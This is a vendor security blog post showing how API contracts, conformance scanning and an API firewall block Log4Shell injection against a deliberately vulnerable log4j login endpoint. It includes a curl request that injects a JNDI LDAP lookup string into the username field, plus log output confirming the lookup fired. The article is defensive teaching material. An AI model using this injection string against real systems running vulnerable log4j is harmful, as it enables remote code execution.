42CRUNCH BLOG


Protecting your APIs against Log4Shell with 42Crunch


On December 9th, 2021, the log4shell vulnerability hit the news and it has since been every security team’s worst nightmare: trivially exploitable, huge impact with RCE (Remote Code Execution), on a component widely used across traditional enterprise technological stacks, both in in-house and third-party software. All this combined explains its CVSS rating of 10 – the highest possible. It is probably one of the worst flaws I have witnessed in my security career; it gives everything to an attacker for little to no effort. In the last few days, we have seen other vulnerabilities targeting the log4j library.

Understandably, a lot of articles have been written on the log4shell vulnerability and the subsequent vulnerabilities, to explain what it does and how it does it, or articles on how to detect attempts of exploitation.

In this article we take a different approach: we show how a positive security model dramatically reduces your attack surface, effectively hindering and/or blocking such injections, and how a positive security approach can be implemented to secure your APIs from the development phase to the production environments with 42Crunch.

Creating an API contract

Adopting a positive security approach to API design starts with creating an API contract. Think of an API contract as a blueprint of your APIs, a list of formal rules of what your API accepts and how it responds. By definition, in a positive security model, everything not formally allowed by the contract is rejected.

Two approaches can be used to create an API contract:

  • Design first, designing the API contract and then implementing it
  • Code first, developing the API and generating a contract from it

Although we are a bit opinionated and advise on a design-first approach as, from a security standpoint, it helps tremendously with threat modeling, 42Crunch integrates identically with both code-first and design-first approaches.

Here, let’s take a simple flawed contract written in OASv3 format:

"/login": {
            "post": {
                "summary": "Login to the endpoint",
                "description": "A username is passed as parameter and logged by log4j",
                "operationId": "logUser",
                "requestBody": {
		            "required": true,
                    "content": {
                        "application/json": {
                            "schema": {
                                "additionalProperties": false,
                                "type": "object",
                                "properties": {
                                    "user": {
                                        "type": "string"
                                    }
                                }
                            }
                        }
                    }
                },
                ...

From a positive security model standpoint, there is a security issue with how the user property is defined.

How is this definition flawed? This API contract excerpt defines a /login endpoint, that in POST requests accepts a JSON object in its body with a user property of type string. The main issue here is that this user property is not constrained in any way by the contract. Its maximum length is not specified, so the user property could be a 100MB string. Also, every possible character can be inside the user property, e.g.: $é!, quotes, emojis, etc.

A 42Crunch security audit of this API contract — ran for example in one of our free IDE plugins (Visual Studio CodeIntelliJEclipse) — finds the following issues on the user property (excerpt):

  • String schema has no pattern defined
    Possible exploit scenario: If you do not define a pattern for strings, any string is accepted as the input. This could open your backend server to various attacks, such as SQL injection.
  • String schema has no maximum length defined
    Possible exploit scenario: If you do not limit the length of strings, attackers can send longer strings to your API than what your backend server can handle. This could overload your backend server and make it crash. In some cases, this could cause a buffer overflow and allow for executing arbitrary code. Long strings are also more prone to injection attacks.

How do these issues manifest themselves in an actual implementation?

Exploiting a badly designed API

To make this issue concrete, let’s develop a simple vulnerable implementation of this login endpoint that uses log4j 2.14.1, vulnerable to log4shell. This endpoint just outputs to the logs which the user has logged in, returning only {"msg": "OK"} to the client. It looks something like this:

public ResponseEntity<LoggedSchema> logUser(InlineObject inlineObject) {
        LoggedSchema response = new LoggedSchema();
        logger.info("User {} logged in", inlineObject.getUser());
        response.msg("OK");
        return new ResponseEntity<>(response, HttpStatus.OK);
    }

Let’s try a simple call to this endpoint:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "xliic"}'
{"msg":"OK"}

In the running API the following log pops up:

2021-12-20 11:36:26.154  INFO 527382 --- [nio-8080-exec-2] c.x.l.LoginApiImpl : User xliic logged in

Now, instead of this xliic string let’s try an injection. As this application is using a vulnerable version of log4j, an attacker could try injecting inside the user property a JNDI lookup string, such as the log4shell vulnerability:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "${jndi:ldap://willnotwork/xliic}"}'
{"msg":"OK"}

The application logs display the following error, showing that the vulnerability was triggered but failed because the API could not resolve the non-existing willnotwork host to retrieve the resource:

2021-12-20 11:37:20.879  INFO 527382 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
2021-12-20 11:37:20,952 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://willnotwork/xliic]. javax.naming.CommunicationException: willnotwork:389 [Root exception is java.net.UnknownHostException: willnotwork]
	at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:252)
	at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
	at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)
	at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2847)
	at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)
...

Improving the API contract and the security posture

We need to understand what happened — we are dealing with multiple critical security issues here:

  1. A vulnerable version of log4j
  2. Improper data definition and validation that enables injection (cf. OWASP API8:2019)

Because of the improper data validation, the exploitation of the log4j vulnerability is made trivial. An organization attack surface expands with every input or output that is not formally constrained and validated. No amount of exploit detection will ever fill that security hole.

But how can this parameter be constrained?

The problem organizations face is that when security teams want to address this question, they are often don’t know what a specific API is supposed to do or accept. Consequently, they do not have the knowledge to properly enforce an effective security policy on these components besides using attack detection tools (tools to identify bad actors, tools to identify traffic that “looks” suspicious, etc.). And in rare cases they have this knowledge, they have to implement these security policies manually and update them as the API changes.

In an organization, developers have this knowledge. Improving the security posture is a matter of implementing a virtuous feedback loop between the development and security team, sharing this knowledge in a structured format to enable security automation.

In our example, the 42Crunch audit report gives some remediation guidelines of the API contract. Following these guidelines, the API developer specifies the business constraints (pattern and maxLength) on the user property.

    "properties": {
         "user": {
         "type": "string",
         "pattern": "^[a-zA-Z][a-zA-Z0-9]*$",
         "maxLength": 64,
          }
    }

The pattern limits the user property to strings that starts with a lower or uppercase alphabetical character and continue with any alphabetical character or number. Example valid strings are "abc123" or "Hworld1". However, "0hey" is not allowed, because the user cannot start with a number, neither is "a$bc" as the "$" character is not allowed anywhere in this string. Also, the user property is constrained to a maximum of 64 characters.

In practice, by specifying these limitations, we have made a formal definition of the parameters allowed by our API that we can then leverage. The API audit score of our API is now 100/100.

Validating the implementation by ensuring conformance

Whatever the API contract states, it is of limited value if the implementation differs. One crucial step in adopting a positive security approach is ensuring that every formal definition is properly implemented. At 42Crunch, the Conformance scanner does just that: it validates whether the API properly implements the limitations and constraints of the API Contract.

Let’s run the conformance scan on this new contract while keeping the implementation vulnerable:

$ $ docker run -e SCAN_TOKEN=***** 42crunch/scand-agent:latest
scand 1.14.1-release:v1.14.1 : 83c525177f3a9b70ef54d05f11139cba1f275f72-N :Mon Dec 20 11:21:02 2021 user@10c96cc2c988
{"level":"error","time":"2021-12-20T11:21:04.75510816Z","message":"scan terminated with state [1] : done"}

In the logs we can find some of the tests ran by the scanner:

...
2021-12-20 12:21:04.701  INFO 531009 --- [nio-8080-exec-9] c.x.l.LoginApiImpl                       : User Qz~A-C-8-~-shNM~2SytwFULX.cIW7T_ logged in
2021-12-20 12:21:04.739  INFO 531009 --- [io-8080-exec-10] c.x.l.LoginApiImpl                       : User goilA0U1WxNeW1gdgUVDsEWJ77aX7tLFJ84qYU6UrN8ctecwZt5S4zjhD0tXRTmkY logged in

In the Conformance scan report, we see that 15 security and conformance issues are found. Two of the listed issues are:

  • Test: The generated value does not follow the property pattern for strings [FAILURE]
    In this test, the scanner generated a user property that does not match the pattern allowed. The API did not reject the request, indicating that pattern constraints on this parameter are not implemented.
  • Test: The generated value does not follow the property maxLength for strings [FAILURE]
    In this test, the scanner generated a user property that does not match the maximum length defined. The API did not reject the request, indicating maximum length constraints on this parameter are not implemented.

Here the Conformance scan allowed us to identify that the API does not enforce the API contract constraints. Because of that, the API is vulnerable to multiple injections such as the log4shell vulnerability.

We already saw that the audit plugin was available for developers inside their IDEs. But API audits&Conformance scans can also be integrated through native plugins in the CI/CD pipelines for security teams to enforce security gates in the build process and ensure no such issues will be found in production.

Enforcing the contract to protect the API

Now, imagine this vulnerable implementation is running in production. How can this API be protected with this positive security approach while the implementation is being fixed to conform to the secured contract? A gap in patching is a major issue for organizations.

To address this, 42Crunch developed a very low latency API firewall that autoconfigures itself with an API contract. This firewall will only forward to the API server and to the API client traffic that conforms to the contract, enforcing this positive security model approach. Also, this firewall supports security policies (rate limiting, JWT token validation, etc.) that can be injected into the contract to enable security-as-code.

Besides the low latency of our API firewall, one major difference with a traditional WAF approach is this formal definition with an API contract. By looking at a request and a contract a security engineer can know without any doubt whether a request will be blocked or not. If the contract explicitly allows it, then it is allowed; if not, it is denied. There is no grey area, no guesswork, no false positive or false negatives, by definition.

Let’s run the same requests through the API firewall:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "xliic"}'
{"msg":"OK"}

This request goes through, without any issue as the user property conforms to the API contract.

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "${jndi:ldap://willnotwork/xliic}"}'
{
    "status": 403,
    "title": "request validation",
    "detail": "Forbidden",
    "uuid": "f8a9cb12-8be9-4dc1-9e3d-738008b91f1a"
}

Here, the request is blocked by the API firewall as it does not conform to the API contract. The tentative injection in the user property does not match the pattern constraint and is rightfully blocked by the API firewall. The API still has a vulnerability — both the log4j dependency and the data validation should be patched. But by adopting a positive security model and enforcing it, the attack surface has effectively shrunk and the API is protected.

Conclusion

The key takeaways are:

  • Security must be implemented all across the SDLC — shift left and shield right
  • Shrinking the attack surface of APIs starts with data validation
  • Data validation should be implemented through a formal positive security model
  • Positive security models avoid security guesswork and enable security automation

Stages of positive security model implementation:

  • Define API inputs and outputs in an API contract
  • Verify conformance of API implementation against the API contract
  • Enforce the API contract at runtime